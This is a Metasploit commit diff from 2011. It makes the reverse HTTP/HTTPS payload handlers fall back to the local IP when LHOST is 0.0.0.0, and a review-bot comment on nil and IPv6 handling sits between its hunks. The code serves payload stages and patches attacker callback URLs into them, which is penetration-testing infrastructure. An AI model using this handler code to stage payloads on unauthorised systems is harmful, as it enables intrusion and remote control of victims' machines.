Handle situations where the user set LHOST to 0.0.0.0 in the handler by defaulting LHOST to our locally visible IP for the specific client. This solves some integration issues where 0.0.0.0 was accidentally used.

git-svn-id: file:///home/svn/framework3/trunk@13782 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2011-09-23 17:04:24 +00:00
parent 4d850c1ee6
commit 616913c4c1
2 changed files with 20 additions and 5 deletions


@ -123,13 +123,21 @@ protected
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
lhost = datastore['LHOST']
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
if lhost.empty? or lhost == '0.0.0.0'
lhost = Rex::Socket.source_address(cli.peerhost)
end
# Process the requested resource. # Process the requested resource.
case req.relative_resource case req.relative_resource
when /^\/INITJM/ when /^\/INITJM/
print_line("java: #{req.relative_resource}") print_line("Java: #{req.relative_resource}")
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
print_line "URL: #{url.inspect}" print_line "URL: #{url.inspect}"
blob = "" blob = ""
@ -178,7 +186,7 @@ protected
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
i = blob.index("https://" + ("X" * 256)) i = blob.index("https://" + ("X" * 256))
if i if i
url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
blob[i, url.length] = url blob[i, url.length] = url
end end
print_status("Patched URL at offset #{i}...") print_status("Patched URL at offset #{i}...")
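Review bot: The new `lhost.empty?` check in the first hunk raises NoMethodError if datastore['LHOST'] is unset (nil) rather than an empty string, so the guard should also cover nil, e.g. `if lhost.nil? || lhost.empty? || lhost == '0.0.0.0'` (and `||` is preferable to `or` in a boolean condition). The fallback `Rex::Socket.source_address(cli.peerhost)` can presumably return an IPv6 literal when the client connected over IPv6, and the URLs built later in both hunks (`"http://#{lhost}:#{datastore['LPORT']}/"`) do not bracket the host, which would yield an unparsable URL; the `'0.0.0.0'` comparison likewise does not treat the `::` wildcard as "unset". The same resolution block is duplicated verbatim in the second file section (its hunk at line 124), so it is a candidate for a single shared helper that both handlers call. The enclosing method starts before and ends after these hunks.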


@ -124,11 +124,18 @@ protected
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
lhost = datastore['LHOST']
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
if lhost.empty? or lhost == '0.0.0.0'
lhost = Rex::Socket.source_address(cli.peerhost)
end
# Process the requested resource. # Process the requested resource.
case req.relative_resource case req.relative_resource
when /^\/INITJM/ when /^\/INITJM/
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
#$stdout.puts "URL: #{url.inspect}" #$stdout.puts "URL: #{url.inspect}"
blob = "" blob = ""
@ -176,7 +183,7 @@ protected
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
i = blob.index("https://" + ("X" * 256)) i = blob.index("https://" + ("X" * 256))
if i if i
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
blob[i, url.length] = url blob[i, url.length] = url
end end
print_status("Patched URL at offset #{i}...") print_status("Patched URL at offset #{i}...")